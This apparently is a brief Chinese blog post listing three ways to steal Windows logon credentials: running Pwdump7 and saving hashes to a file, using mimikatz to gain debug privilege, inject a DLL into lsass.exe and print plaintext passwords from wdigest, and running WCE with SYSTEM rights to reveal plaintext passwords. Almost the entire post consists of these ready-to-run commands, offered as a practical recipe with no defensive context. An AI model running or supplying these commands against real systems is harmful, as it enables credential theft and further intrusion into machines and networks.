这篇文章上次修改于 1389 天前，可能其部分内容已经发生变化，如有疑问可询问作者。

三种比较实用的方法： 1>Pwdump7

Pwdump7.exe

Pwdump7.exe >pass.txt

  2>mimikatz //运行mimikatz.exe //提升权限（可免）：

privilege::debug

//注入DLL：

inject::process lsass.exe "C:sekurlsa.dll"

//抓取密码：

@getLogonPasswords

wdigest后面为明文密码。 //EXIT退出。

3>WCE(Windows Credentials Editor)1.3 一直都是用1.3,试过1.4beta，程序出错。 system权限直接爆明文：

wce.exe -w